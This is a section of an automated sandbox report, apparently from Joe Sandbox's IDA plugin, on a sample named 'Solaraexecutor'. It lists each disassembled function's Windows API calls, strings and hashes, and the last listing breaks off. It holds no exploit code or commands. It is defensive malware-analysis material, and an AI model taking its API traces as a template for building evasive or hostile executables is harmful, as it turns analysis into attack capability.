Opcode Fuzzy Hash: 962c55a2fcddb09a52f8f746b0045e0e4bdaab900f33cea999feb8c71f36118a
Instruction Fuzzy Hash: 5791C472258344BFD221DBA0DC49FFB77ACEB49B45F044819FA89D6181EB71EA048772

Function 00D26FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D26FAA
_wcslen.LIBCMT ref: 00D27013
_wcslen.LIBCMT ref: 00D27084

Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00

Part of subcall function 00D2A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641,000000FF), ref: 00D2A1F1
Part of subcall function 00D2A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641), ref: 00D2A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D27139
CloseHandle.KERNEL32(00000000), ref: 00D27155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D27298

Part of subcall function 00D29DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D273BC,?,?,?,00000000), ref: 00D29DBC
Part of subcall function 00D29DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D29E70

Part of subcall function 00D29620: CloseHandle.KERNELBASE(000000FF,?,?,00D295D6,?,?,?,?,?,00D52641,000000FF), ref: 00D2963B

Part of subcall function 00D2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501
Part of subcall function 00D2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00D26FCC
UNC\, xrefs: 00D27051
\??\, xrefs: 00D2702B
SeRestorePrivilege, xrefs: 00D26FC2

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 268fabf9fd670dff6e9a14d27d92e283a72e285cd7533b7d00b48463501cfaaf
Instruction ID: 839c9e66c8835952510eddbe04b61b3e5848f92bef3e00fd0ddfbfab2c73b6e2
Opcode Fuzzy Hash: 268fabf9fd670dff6e9a14d27d92e283a72e285cd7533b7d00b48463501cfaaf
Instruction Fuzzy Hash: DBC1E671904324ABDB31DB74EC41FEEB7A8EF28308F044559F956E7282D730AA488B71

Function 00D3F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D3F844
IsDebuggerPresent.KERNEL32 ref: 00D3F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D3F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00D3F93A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 78044c1c28e409422ece5398132101984de1a88606c803c168e9ac0bdfdaa622
Instruction ID: feb3b900eadd781db51dc1910c3edd9e2b3c14be72f950b555ce24b8c93669e2
Opcode Fuzzy Hash: 78044c1c28e409422ece5398132101984de1a88606c803c168e9ac0bdfdaa622
Instruction Fuzzy Hash: 9E312775D0531D9BDB21DFA4D989BCCBBB8AF08304F1040AAE40CAB250EB719B848F64

Function 00D3E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00D3E5E8,0000001C,00D3E7DD,00000000,?,?,?,?,?,?,?,00D3E5E8,00000004,00D81CEC,00D3E86D), ref: 00D3E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D3E5E8,00000004,00D81CEC,00D3E86D), ref: 00D3E6CF

Strings

D, xrefs: 00D3E6C3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 5357a2921cb3f0087c1fa494312a9e9b5378a156dfd24b06957933ff49376bd8
Instruction ID: b55c8de80152e28a2cac6cbf3ea9d4611a33868615737359faeaca4e37d3c384
Opcode Fuzzy Hash: 5357a2921cb3f0087c1fa494312a9e9b5378a156dfd24b06957933ff49376bd8
Instruction Fuzzy Hash: 7D01F7726002096BDB14DF29DC49BDD7BAAAFC4324F0CC120ED19D7290DA34DD0586A0

Function 00D48EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D48FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D48FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00D48FCC

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bb1609005e59fb38e157cf34846eba7390bcf7d6a5c42bd71ca9964528cc44c4
Instruction ID: aebcd117f6acf651f43d661d479759aa83cf757accba35def8cd05bd2a44b351
Opcode Fuzzy Hash: bb1609005e59fb38e157cf34846eba7390bcf7d6a5c42bd71ca9964528cc44c4
Instruction Fuzzy Hash: C331B77590131C9BCB21DF64D889B9DBBB4EF08350F5041EAE81CA6250EB709F858F64

Function 00D3AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D3AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00D5E72C,?,?), ref: 00D3AF84

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: e079c908ab302bbd833bab99734867586424bf1eddccaa80f7a693f25a2f8e3c
Instruction ID: 8070c32c9688f0d505365349cb04dc7c14d1c55c00a76792ed8a996b88839df1
Opcode Fuzzy Hash: e079c908ab302bbd833bab99734867586424bf1eddccaa80f7a693f25a2f8e3c
Instruction Fuzzy Hash: 0C015E3A100308AAD7119F74DC45F9A77B8EF08751F104022FE09D7251E3709A248BB5

Function 00D26C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00D26DDF,00000000,00000400), ref: 00D26C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D26C95

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ed545c1fd50c6e2cd7013398b01b7e93866b7c9406c504333c032cb4bfa02544
Instruction ID: 188217dc1bef2c923be9d0866a1092e833eae9b1c8c70a14153c52bbdbb469e6
Opcode Fuzzy Hash: ed545c1fd50c6e2cd7013398b01b7e93866b7c9406c504333c032cb4bfa02544
Instruction Fuzzy Hash: AFD05230244300BAEA011E219C06F2A2B98AB50B82F28C004BA80E80E0CA70C820A638

Function 00D3F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D3F66A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b8376ddbe548f12aa3fed611ff4595600bb92c059e64625bf55e303a932d23a2
Instruction ID: bad376ae2621c7198e02c7bf45bea7d68606615973d8cebdc8723f6c29714ef2
Opcode Fuzzy Hash: b8376ddbe548f12aa3fed611ff4595600bb92c059e64625bf55e303a932d23a2
Instruction Fuzzy Hash: CB515BB1D107099FDB28CF55E9857AABBF8FB48354F28852AD801EB350D374A905CB70

Function 00D2B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00D2B16B

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 108b5772210ed76c7016a4383c5e9c840787eb13b63a78c587fcc9100267eb81
Instruction ID: 084d8c495b6b353646765e05c8a33692e2c176449cda2590b44528b3be6fd9c8
Opcode Fuzzy Hash: 108b5772210ed76c7016a4383c5e9c840787eb13b63a78c587fcc9100267eb81
Instruction Fuzzy Hash: 09F01DB8D003588FDB18DF18EC916DA73B1E75831AF144295D915D3390C7B0AA84CE70

Function 00D3F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00D3F3A5), ref: 00D3F9DA

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a9c0370b9b23c63610a28fb0ad3f9689403aeeae46ba6b6528bbd3fae0d56732
Instruction ID: 25ecaf05575c3105b7211584622e3e496252d6f1387516ff7e3ed01657244194
Opcode Fuzzy Hash: a9c0370b9b23c63610a28fb0ad3f9689403aeeae46ba6b6528bbd3fae0d56732
Instruction Fuzzy Hash:

Function 00D4C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00D4C030

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b43d94e3a064be5c868d2b3e5a654d0366503c25fe577cfc6dda450e2d7180a4
Instruction ID: 360d14981f5df24067682cdd988e3c117b24424f7c7313be0fe28835ea8538a4
Opcode Fuzzy Hash: b43d94e3a064be5c868d2b3e5a654d0366503c25fe577cfc6dda450e2d7180a4
Instruction Fuzzy Hash: 3AA02230202300CFC300CF30AF0EB0C3BE8AE003E2308002AA808C0330FF3080A0AB20

Function 00D2E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D2E30E

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

Part of subcall function 00D31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D61030,00000200,00D2D928,00000000,?,00000050,00D61030), ref: 00D31DC4

_strlen.LIBCMT ref: 00D2E32F
SetDlgItemTextW.USER32(?,00D5E274,?), ref: 00D2E38F
GetWindowRect.USER32(?,?), ref: 00D2E3C9
GetClientRect.USER32(?,?), ref: 00D2E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00D2E475
GetWindowRect.USER32(?,?), ref: 00D2E4A2
SetWindowTextW.USER32(?,?), ref: 00D2E4DB
GetSystemMetrics.USER32(00000008), ref: 00D2E4E3
GetWindow.USER32(?,00000005), ref: 00D2E4EE
GetWindowRect.USER32(00000000,?), ref: 00D2E51B
GetWindow.USER32(00000000,00000002), ref: 00D2E58D

Strings

CAPTION, xrefs: 00D2E4BD
d, xrefs: 00D2E3F5
$%s:, xrefs: 00D2E302

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 663f063279028e24746084e103423e08fe9ee25958b76e96ceccda69992460d5
Instruction ID: 4807ada90e6c352204991aa4b5b00b60c2b0a97692afe8fa0f2d2b6153393c4b
Opcode Fuzzy Hash: 663f063279028e24746084e103423e08fe9ee25958b76e96ceccda69992460d5
Instruction Fuzzy Hash: DB819272108311AFD710DF68DD89E6FBBE9EBC8B08F04091DFA88D7250D634E9058B62

Function 00D4CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D4CB66

Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C71E
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C730
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C742
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C754
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C766
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C778
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C78A
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C79C
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7AE
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7C0
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7D2
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7E4
Part of subcall function 00D4C701: _free.LIBCMT ref: 00D4C7F6

_free.LIBCMT ref: 00D4CB5B

Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4

_free.LIBCMT ref: 00D4CB7D
_free.LIBCMT ref: 00D4CB92
_free.LIBCMT ref: 00D4CB9D
_free.LIBCMT ref: 00D4CBBF
_free.LIBCMT ref: 00D4CBD2
_free.LIBCMT ref: 00D4CBE0
_free.LIBCMT ref: 00D4CBEB
_free.LIBCMT ref: 00D4CC23
_free.LIBCMT ref: 00D4CC2A
_free.LIBCMT ref: 00D4CC47
_free.LIBCMT ref: 00D4CC5F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2ed0412f5df3ab7311bda6b0d043171f544204b451458a95291b14fafbcd47e5
Instruction ID: 15e04b5c57d1667174502a764ba43a769bb6f1941780753ee9f83e5e87b91c3b
Opcode Fuzzy Hash: 2ed0412f5df3ab7311bda6b0d043171f544204b451458a95291b14fafbcd47e5
Instruction Fuzzy Hash: 22315E31A123059FEB61AA79D886B5A77E9EF10350F186429F598D71A2DF31EC40DF30

Function 00D39711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D39736
_wcslen.LIBCMT ref: 00D397D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00D397E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D39806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D3982D

Strings

</html>, xrefs: 00D397B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00D39760
utf-8"></head>, xrefs: 00D3976B
<html>, xrefs: 00D39755, 00D3978E

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 064d6bede741d125fdcccccc9db94f6a65b3313a6f182108d1835f74e76978b1
Instruction ID: d49f2463ed10754795eefc5280ded166a4532d64c1a1ed9020ca87573f3df70f
Opcode Fuzzy Hash: 064d6bede741d125fdcccccc9db94f6a65b3313a6f182108d1835f74e76978b1
Instruction Fuzzy Hash: A8314A321093017FE725AF34DC06FAFB798DF82721F19051DF902961D2EBA49A4983B6

Function 00D3D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00D3D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00D3D6ED

Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00D3D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D3D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00D3D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D3D75D
DeleteObject.GDI32(00000000), ref: 00D3D764
GetWindow.USER32(00000000,00000002), ref: 00D3D76D

Strings

STATIC, xrefs: 00D3D6F3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: b9545baa43228e28cd12b9bdb95cba4d612dd8d3682107de652c73831aa9cf58
Instruction ID: 2c6e8d289eb8427134bdd997c7ba895e446e2075b0e2052df58a88fd2e67c483
Opcode Fuzzy Hash: b9545baa43228e28cd12b9bdb95cba4d612dd8d3682107de652c73831aa9cf58
Instruction Fuzzy Hash: 911133B22007107BE220ABB4EC4AFAF765DEF00F02F044120FA46E21D1DA648F054BB2

Function 00D496F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D49705

Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4

_free.LIBCMT ref: 00D49711
_free.LIBCMT ref: 00D4971C
_free.LIBCMT ref: 00D49727
_free.LIBCMT ref: 00D49732
_free.LIBCMT ref: 00D4973D
_free.LIBCMT ref: 00D49748
_free.LIBCMT ref: 00D49753
